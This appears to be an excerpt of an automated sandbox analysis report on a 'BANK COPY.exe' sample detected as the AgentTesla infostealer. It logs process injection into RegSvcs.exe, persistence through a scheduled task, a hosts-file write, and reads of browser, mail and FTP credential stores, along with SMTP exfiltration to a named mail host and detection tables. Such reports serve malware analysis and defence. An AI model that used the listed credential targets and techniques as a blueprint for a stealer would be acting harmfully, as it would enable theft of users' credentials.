                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.BANK COPY.exe.3d1e9d8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BANK COPY.exe.3d1e9d8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000000.280231622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.290430667.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: BANK COPY.exe PID: 5724, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4692, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: Yara matchFile source: 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4692, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0.2.BANK COPY.exe.3d1e9d8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BANK COPY.exe.3d1e9d8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000000.280231622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.290430667.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: BANK COPY.exe PID: 5724, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4692, type: MEMORYSTR
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts211
                  Windows Management Instrumentation
                  1
                  Scheduled Task/Job
                  211
                  Process Injection
                  1
                  File and Directory Permissions Modification
                  2
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  Exfiltration Over Other Network Medium1
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts2
                  Command and Scripting Interpreter
                  1
                  Registry Run Keys / Startup Folder
                  1
                  Scheduled Task/Job
                  1
                  Disable or Modify Tools
                  1
                  Input Capture
                  114
                  System Information Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  Exfiltration Over Bluetooth1
                  Non-Standard Port
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts1
                  Scheduled Task/Job
                  Logon Script (Windows)1
                  Registry Run Keys / Startup Folder
                  1
                  Deobfuscate/Decode Files or Information
                  1
                  Credentials in Registry
                  311
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  Automated Exfiltration1
                  Non-Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
                  Obfuscated Files or Information
                  NTDS1
                  Process Discovery
                  Distributed Component Object Model1
                  Input Capture
                  Scheduled Transfer11
                  Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script13
                  Software Packing
                  LSA Secrets131
                  Virtualization/Sandbox Evasion
                  SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  Masquerading
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                  Virtualization/Sandbox Evasion
                  DCSync1
                  Remote System Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job211
                  Process Injection
                  Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                  Hidden Files and Directories
                  /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 680551 Sample: BANK COPY.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus detection for dropped file 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 11 other signatures 2->54 7 BANK COPY.exe 6 2->7         started        11 yqWDN.exe 2 2->11         started        13 yqWDN.exe 1 2->13         started        process3 file4 32 C:\Users\user\AppData\Roaming\gPxsznxm.exe, PE32 7->32 dropped 34 C:\Users\user\AppData\Local\...\tmp1205.tmp, XML 7->34 dropped 36 C:\Users\user\AppData\...\BANK COPY.exe.log, ASCII 7->36 dropped 56 Writes to foreign memory regions 7->56 58 Injects a PE file into a foreign processes 7->58 15 RegSvcs.exe 2 4 7->15         started        20 schtasks.exe 1 7->20         started        22 conhost.exe 11->22         started        24 conhost.exe 13->24         started        signatures5 process6 dnsIp7 38 mail.absheron-sharab.az 162.241.217.198, 49752, 587 UNIFIEDLAYER-AS-1US United States 15->38 28 C:\Users\user\AppData\Roaming\...\yqWDN.exe, PE32 15->28 dropped 30 C:\Windows\System32\drivers\etc\hosts, ASCII 15->30 dropped 40 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->40 42 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->42 44 Tries to steal Mail credentials (via file / registry access) 15->44 46 5 other signatures 15->46 26 conhost.exe 20->26         started        file8 signatures9 process10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  BANK COPY.exe55%VirustotalBrowse
                  BANK COPY.exe39%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                  BANK COPY.exe100%AviraHEUR/AGEN.1235476
                  BANK COPY.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\gPxsznxm.exe100%AviraHEUR/AGEN.1235476
                  C:\Users\user\AppData\Roaming\gPxsznxm.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\gPxsznxm.exe39%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                  C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe0%MetadefenderBrowse
                  C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe0%ReversingLabs
                  SourceDetectionScannerLabelLinkDownload
                  7.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                  0.0.BANK COPY.exe.780000.0.unpack100%AviraHEUR/AGEN.1235476Download File
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                  http://www.fonts.comick0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://CqUOsT.com0%Avira URL Cloudsafe
                  http://mail.absheron-sharab.az0%Avira URL Cloudsafe
                  http://www.fontbureau.comgritogy0%Avira URL Cloudsafe
                  http://lzmd6XB2MFu.net0%Avira URL Cloudsafe
                  http://www.sandoll.co.kr0t0%Avira URL Cloudsafe
                  http://www.fontbureau.comedta0%Avira URL Cloudsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.fontbureau.comessed0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.carterandcone.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                  http://www.fontbureau.comany0%Avira URL Cloudsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.sandoll.co.krK0%Avira URL Cloudsafe
                  http://www.fontbureau.com;z0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cnt-p0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.de0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.fontbureau.com.TTF0%URL Reputationsafe
                  http://www.fontbureau.comueed0%URL Reputationsafe
                  http://www.fontbureau.comF0%URL Reputationsafe
                  http://www.fontbureau.comouyn0%Avira URL Cloudsafe
                  http://www.agfamonotype.0%URL Reputationsafe
                  http://www.sajatypeworks.coms0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                  http://www.urwpp.deF0%URL Reputationsafe
                  http://www.fonts.com-uH0%Avira URL Cloudsafe
                  http://www.fonts.comY0%Avira URL Cloudsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.founder.com.cn/cn/0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.fonts.comcY0%Avira URL Cloudsafe
                  http://www.monotype.0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.tiro.comP0%URL Reputationsafe
                  http://www.tiro.comk0%URL Reputationsafe
                  http://www.fontbureau.comitu0%URL Reputationsafe
                  http://www.sajatypeworks.coma-dt0%Avira URL Cloudsafe
                  http://www.fontbureau.comalsFny0%Avira URL Cloudsafe
                  http://www.urwpp.dec0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  mail.absheron-sharab.az
                  162.241.217.198
                  truefalse
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1RegSvcs.exe, 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://www.fontbureau.com/designersGBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.fontbureau.com/designers/?BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.fonts.comickBANK COPY.exe, 00000000.00000003.242351755.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242269007.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242234514.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242308012.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.founder.com.cn/cn/bTheBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://CqUOsT.comRegSvcs.exe, 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://mail.absheron-sharab.azRegSvcs.exe, 00000007.00000002.517926898.000000000353A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fontbureau.com/designers?BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.comgritogyBANK COPY.exe, 00000000.00000002.297152512.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.282184712.0000000005B60000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://lzmd6XB2MFu.netRegSvcs.exe, 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.sandoll.co.kr0tBANK COPY.exe, 00000000.00000003.243969163.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fontbureau.comedtaBANK COPY.exe, 00000000.00000003.249576412.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.tiro.comBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242721047.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242814661.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designersBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.comessedBANK COPY.exe, 00000000.00000003.249576412.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.249860644.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.goodfont.co.krBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.comBANK COPY.exe, 00000000.00000003.246868723.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.247238905.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.247092273.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sajatypeworks.comBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242051970.0000000005B82000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242292859.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242252206.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242276187.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242005445.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.241973593.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242191863.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242028008.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.241943884.0000000005B7F000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.typography.netDBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cn/cTheBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.galapagosdesign.com/staff/dennis.htmBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://fontfabrik.comBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://DynDns.comDynDNSnamejidpasswordPsi/PsiRegSvcs.exe, 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/BANK COPY.exe, 00000000.00000003.249576412.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.249860644.0000000005B6A000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comanyBANK COPY.exe, 00000000.00000002.297152512.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.282184712.0000000005B60000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.galapagosdesign.com/DPleaseBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.sandoll.co.krKBANK COPY.exe, 00000000.00000003.243969163.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com;zBANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              http://www.founder.com.cn/cnt-pBANK COPY.exe, 00000000.00000003.244727394.0000000005B9D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fonts.comBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242252206.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242276187.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242269007.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.sandoll.co.krBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.243969163.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.urwpp.deDPleaseBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.urwpp.deBANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.zhongyicts.com.cnBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBANK COPY.exe, 00000000.00000002.284491796.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
